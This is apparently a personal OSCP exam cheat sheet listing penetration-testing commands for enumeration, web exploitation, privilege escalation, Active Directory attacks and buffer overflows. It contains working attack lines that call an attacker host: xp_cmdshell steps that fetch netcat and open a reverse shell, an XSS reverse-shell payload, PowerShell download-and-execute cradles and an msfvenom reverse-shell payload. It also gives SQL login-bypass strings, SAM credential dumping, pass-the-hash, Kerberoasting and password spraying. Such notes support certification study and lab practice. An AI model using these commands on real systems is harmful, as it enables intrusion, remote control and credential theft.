I Passed the OSCP in January 2021. These are the notes I took along my journey to achieving it.
- Enumeration
- Web Exploitation
- Post Exploitation Linux
- Post Exploitation Windows
- Active Directory
- Pivoting & Port Forwarding
- Other
- Buffer Overflow
Basics
-
Standard Port Scan
sudo nmap -T4 -p- -A --osscan-guess --version-all -o in.scan -Pn
-
Udp Port Scan
sudo nmap --top-ports 100 -sU -o udp.scan -Pn
-
Extensions
txt,php,aspx,cgi,asp,html,jsp,pdf,doc,docx,xls,xlsx,rtf,bak,xml,xsl,phpthml,sh,pl,py,config,php7,exe
-
Wordlists
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/big.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt
TCP 21: FTP
-
Download Everything
wget -m ftp://anonymous:anonymous@<ip>
-
Ftp Nmap Scan
nmap --script ftp-anon,ftp-bounce,ftp-brute,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-syst -p21 <RHOST>
-
Ssl Ftp Connection
openssl s_client -connect <RHOST>:21 -starttls ftp
TCP 22: SSH
- Bruteforce
hydra -l root -P /usr/share/wordlists/password/10k <RHOST> -t 4 ssh
TCP 25: SMTP
-
Nmap Enumeration
sudo nmap --script "smtp-commands,smtp-open-relay,smtp-vuln*" -p25 <RHOST>
-
User Enumeration
sudo nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} -p25 <RHOST>
-
Version Scan
auxiliary/scanner/smtp/smtp_enum
-
Introduction
HELO <LHOST> || EHLO <LHOST>
-
Enumerate Users
EXPN <user> || VRFY <user>
-
Send Mail From
MAIL FROM:test@test.org
-
Send Mail To
RCPT TO:<user>
TCP 53: DNS
-
Standard Enum
nslookup server <RHOST> 127.0.0.1 <RHOST>
-
Zone Transfer
dig axfr @<RHOST> <dnsname>
-
Dns Recon
dnsrecon -r 127.0.0.0/24 -n <rhost> dnsrecon -d <RHOST> -r 10.0.0.0/8
TCP 79: Finger Enumeration
tcp 88: Kerberos
TCP 110: POP3
-
Nmap Enum Script
sudo nmap --script pop3-capabilities,pop3-ntlm-info -p110 <RHOST>
-
Bruteforce
sudo nmap --script pop3-brute -p110 <RHOST>
auxiliary/scanner/pop3/pop3_login
-
Login
USER <username> PASS <password> list - List Emails retr <email_num> - Retrieve Email
TCP 111: RPCBIND
- Enumeration
rpcinfo -p <RHOST>
rpcinfo -s <RHOST>
TCP 119: NNTP
- Possible commands
HELP, LIST
TCP 135 MSRPC
-
Nmap Scan
sudo nmap -n -sV -Pn -p 135 --script=msrpc-enum <RHOST>
-
MSF Enum
use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
-
RPC Dump
/usr/bin/impacket-rpcdump <RHOST> -p 135
TCP 139/445: SMB/RPC
-
smbmap
smbmap -H <RHOST>
-
enum4linux-ng
/opt/enum4linux-ng/enum4linux-ng.py -A <rhost>
-
Version Scan
use auxiliary/scanner/smb/smb_version
-
light nmap
sudo nmap -p445 --script safe 10.10.10.100
-
Enumerate Share Permissions
crackmapexec smb <RHOST> --shares
-
Log Into Shares
smbclient //<RHOST>/<Share> -U <user>
-
Dump Info
python3 /usr/share/doc/python3-impacket/examples/samrdump.py <RHOST>
-
Dump Info
rpcclient -U "" <RHOST>
TCP 143:
-
Login
A001 login <user> <password>
-
Use Evolution Mail Client to Log In
TCP 389: LDAP
- ldapsearch
ldapsearch -h <rhost> -x
ldapsearch -h <rhost> -x -s base namingcontexts
ldapsearch -h <rhost> -x -b "<information from previous command>"
ldapsearch -h <rhost> -x -b "<information from previous command>" '(objectClass=Person)'
TCP 443
-
Manually Check Certificate
-
Add DNS Names to /etc/hosts
-
SSL Enum
nmap -sV --script ssl-enum-ciphers <RHOST>
-
Nikto
nikto -h <RHOST> -p 443 -output nikto_443
-
SSLScan
sslscan <ip>
TCP 1433: MSSQL
-
Nmap Scan
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER <RHOST>
-
Log In
sqsh -S <RHOST> -U <user>
-
Another Login
use auxiliary/scanner/mssql/mssql_login
TCP 1521: ORACLE
TCP 2049: NFS
- Show Mountable Files
showmount -a(d)(e) <RHOST>
TCP 3306: MYSQL
-
Login
mysql -u <user> -p
-
Extensive Nmap
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <RHOST>
-
MSF Scripts
use auxiliary/scanner/mysql/mysql_version use auxiliary/scanner/mysql/mysql_authbypass_hashdump auxiliary/scanner/mysql/mysql_hashdump mysql_enum mysql_schemadump mysql_start_up
TCP 3389: RDP
- Log In
rdesktop -u <user> -p <password> <RHOST>
UDP 161: SNMP
- Enum
snmpwalk -c public -v2c <RHOST>
snmp-check <RHOST>
Active Directory
-
rpcclient <rhost> (-U '') enumdomusers enumdomains srvinfo setuserinfo2 <user> 23 '<new_pass>' createdomuser username setuserinfo2 username 24 <password>
-
SMB
-
Kerbrute
./kerbrute userenum --dc <rhost> -d <domain> <users.txt>
-
Npusers (Dump hashes for users)
'GetNPUsers.py -dc-ip -no-pass -usersfile <users.txt> /` -
edit /etc/resolve.conf nameserver <rhost> search <domain> python3 bloodhound.py -u <user> -p <password> -ns <rhost> -d domain -c all Run Bloodhound
-
ldap
SQL Injection
-
SQLMap
sqlmap -r <burp_file>
-
Test for SQLI
' '-- - ASCII(97) ' or 1=1-- '; waitfor delay ('0:0:20)'-- wfuzz -u http://<RHOST>/FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt
-
Login Bypass
admin' -- admin' -- - admin'- admin' # admin'/* admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or '1'='1-- admin') or ('1'='1--
-
Abuse Command Shell
' EXEC sp_configure 'xp_cmdshell', 1-- ' reconfigure-- ' EXEC xp_cmdshell 'certutil -urlcache -f http://<LHOST>:<LPORT>/nc.exe nc.exe'-- ' EXEC xp_cmdshell "nc.exe -e cmd.exe <LHOST> <LPORT>";--
`LFI/RFI`
-
Linux Path
../../../../../../../../etc/passwd
-
Windows LFI
c:\windows\system32\drivers\etc\hosts
-
RFI
http://<LHOST:80>/p0wny_shell.php
-
Wordlists
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
CGI-BIN
-
Popular Extensions: .sh & .pl
-
Nmap Check
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/<vulnerable file>,cmd=ls <RHOST>
-
MSF Check
auxiliary/scanner/http/apache_mod_cgi_bash_env
-
MSF Exploit
exploit/multi/http/apache_mod_cgi_bash_env_exec
XSS
-
Test
test: <img src=http://<lhost>/<lport>)>
-
Reverse Shell
<img src=http://<lhost>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<LHOST>'$IFS'<LHOST>')>
CMS
-
WORDPRESS
wpscan --url http://<RHOST> (--api-token <token>) -e u,ap,at --plugins-detection aggressive
-
MAGENTO
Magescan
Bruteforce
- hydra
hydra -l admin -P /usr/share/wordlists/password/10k <RHOST> http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed' -V -t 64
File Upload
-
Starting Web Server
python3 -m http.server 80
-
Filetransfer
wget <LHOST>/<file> curl http://<LHOST>/<file> -o <output-file> echo "GET /<file> HTTP/1.0" | nc -n <LHOST> 80 > <out-file> && sed -i '1,7d' <out-file>
-
Secure Filetransfers
on target: ncat -nvlp <port> --ssl > <out-file> on kali: ncat -nv <RHOST> <RPORT> --ssl < <file-to-send>
Enum Tools
Linenum
linux smart enumeration
linpeas
pspy
suid3num
Upgrade Shell
python -c 'import pty;pty.spawn("/bin/bash")'
cltr-z
stty raw -echo;fg fg
export TERM=xterm
stty -a ; stty rows columns 136 rows 32
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Manual
-
whoami/id/hostname
-
cat /etc/issue
-
cat /etc/*-release
-
history
-
w
-
ls -l /etc/passwd
-
ls -l /etc/shadow
-
ls -l /etc/group
sudo -l (check for env_keep+=LD_PRELOAD) (check for env_keep+=LD_LIBRARY_PATH) (sudo Version under 1.9, 1.8.27 exploitable)
-
find / -group <mygroup> -ls 2>/dev/null
-
find / -user <myuser> -ls 2>/dev/null
-
cat /etc/exports - (check for nsf)
-
mount -l
-
cat /etc/fstab
-
/bin/lsblk
-
lpstat -a
-
lscpu
Common Files
grep -Rli password
/
/home
/opt
/tmp
/var
Cron
/etc/cronjobs
Service Exploits
-
ps aux | grep "^root"
-
netstat -antup
-
<service> -v
-
<service> --version
-
Debian
dpkg -l | grep <service>
-
Rpm
rpm -qa | grep <service>
SUID & SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-
Check For Writeable Shared Files (Shell)
strace <service> 2>&1 | grep -iE "open|access|no such file" create & compile the above linked shell Execute Service
-
Incomplete Path
strings <service> strace -v -f -e execve <service> 2>&1 If found, create a binary with a reverse shell in the /tmp directory and add it to path PATH=.:$PATH /service
Kernel Exploits
-
uname -a
-
searchsploit linux kernel <version> <distribution> priv esc
-
linux exploit suggester
Network
ip a/ipconfig/ifconfig
route
ss -anp/netstat -anp
dnsdomainname
ls /etc | grep iptables
cat /etc/networks
netstat -punta
File Upload
-
Starting Webserver
python3 -m http.server <LPORT>
-
Certutil
certutil -urlcache -f "http://<LHOST>:<LPORT>/<file>" <output-file>
-
SMB
on kali: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
on target: copy \\<myip>\reverse.exe C:\tmp\reverse.exe
-
Powershell
cmd /c powershell IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell.exe IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell -c IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
-
Curl
curl http://<LHOST>/<file> -o <file>
Enum Tools
-
Powerup
powershell -ep bypass; .\powerup.ps1; Invoke-AllChecks
-
Sherlock
powershell -ep bypass; Import-Module .\sherlock.ps1; Find-AllVulns
Manual
whoami /priv | /groups | /all
systeminfo
hostname
net users | net user <user>
set
tasklist /SCV | tasclist /v
Kernel Exploits
Service Exploits
-
Insecure Service Properties
SERVICE_START & SERVICE_STOP & SERVICE_CHANGE_CONFIG sc qc <service> sc query <service> sc config <service> binpath= "\"C:\<reverse_shell>\"" listener on kali + START/STOP SERVICE
-
Unquoted Service Path
SERVICE_START & SERVICE_STOP + unquoted service path
-
Weak Registry Permissions
reg query <full path to service>
-
Insecure Service Executables
check winpeas for writeable service executable replace file with reverse shell
-
DLL Hijacking
Check all services winpeas recognizes 1 by 1 sc qc <service>
Scheduled Tasks
dir C:\windows\tasks
schtasks /query /fo LIST /v
Network
ipconfig | ifconfig
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
Registry
-
Autorun
Overwrite program with reverse shell and restart
-
Always Install Elevated
Check Winpeas for always install elevated
Common Files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
C:\unattend.xml
C:\Windows\System32\
C:\Windows\System32\sysprep\
C:\sysprep.inf
C:\sysprep\sysprep.xml
Passwords
-
Use chisel to remotely forward port 445, and use winexe to log in
winexe -U <user>%<password> //<RHOST> cmd.exe
-
Check for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
-
Weak Permissions on Sam Files
python2 pwdump.py <SYSTEMFILE> <SAMFILE>
-
Cracking the password
hashcat -m 1000 --force <hash> <wordlist>
-
PTH
pth-winexe -U '<entire-hash>' //<RHOST> cmd.exe
Manual
ipconfig /all
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
netsh firewall show state
netsh firewall show config
netsh dump
net user
net user /domain
net group /domain
Powerview
powershell -ep bypass
. .\powerview.ps1
net accounts
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetComputer
Get-NetGroup
Get-NetGroupMember
Get-DomainUser -SPN
Get-NetLoggedon -ComputerName <pc-name>
Get-NetSession -ComputerName <pc-name>
Invoke-ShareFinder
Get-NETGPO
Invoke-Kerberoast
Bloodhound
powershell -ep bypass
. .\sharphound.ps1
Invoke-BloodHound -CollectionMethod All -Domain <domain> -ZipFileName file.zip
Download zip onto kali, import into bloodhound
https://github.com/fox-it/BloodHound.py
Cracking Ad Hashes
ntlm: hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt`
ntlmv2: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt`
PASS THE PW & HASH
crackmapexec <ip>/24 -u <user> -d <DOMAIN> -p <password>
crackmapexec <protocol> <ip>/24 -u <user> -H <hash> --local
Token Impersonation
meterpreter load icognito
list_tokens
impersonate_token <token>
Kerberoasting
Invoke-Kerberoast in powerview
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'c:\temp\hashcapture.txt' -width 8000
https://github.com/skelsec/kerberoast
GetUserSPNs.py -request -dc-ip <RHOST> <domain>/<user>
Password Spraying
-
Create Password List
crunchy <length> <length> -t <pw-core>%%%%
-
Spray
rowbar -b rdp -s <ip>\32 -U users.txt -C pw.txt -n 1
-
On Host: sudo ./chisel.sh server --reverse --port <LPORT> On Target: chisel client <LHOST>:<LPORT> R:<PORT_TO_FWD>:127.0.0.1:<PORT_TO_FWD>
Hashcracking
-
John
john --format=<fomrat> --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
-
Hashcat
hashcat -m <hashid> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O hashcat -m <hashid> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O -r /usr/share/hashcat/rules/best64.rule cat pw | hashcat -r/usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt
SSH Encrypted
/usr/share/john/ssh2john
Crack Zip Pw
fcrackzip -uvDp /usr/share/wordlists/rockyou.txt file.zip
Tcp Dump
sudo tcpdump -i tun0 icmp
Images
binwalk <image>
binwalk -Me <image>
Recognize Encryption
Pip fix (Rarely works)
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python get-pip.py
python -m pip install requests
MYSQL
show databases;
use <database>
show tables;
select * from <table>;
-
!mona config -set workingfolder c:\mona\%p /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <crash_value + 400> !mona findmsp -distance <crash_value> + retn = BBBB !mona bytearray -b "\x00" python bad_chars.py !mona compare -f C:\mona\oscp\bytearray.bin -a <esp addr> !mona jmp -r esp -cpb "\x00" msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=4444 EXITFUNC=thread -b "\x00" -f py padding = "\x90" * 16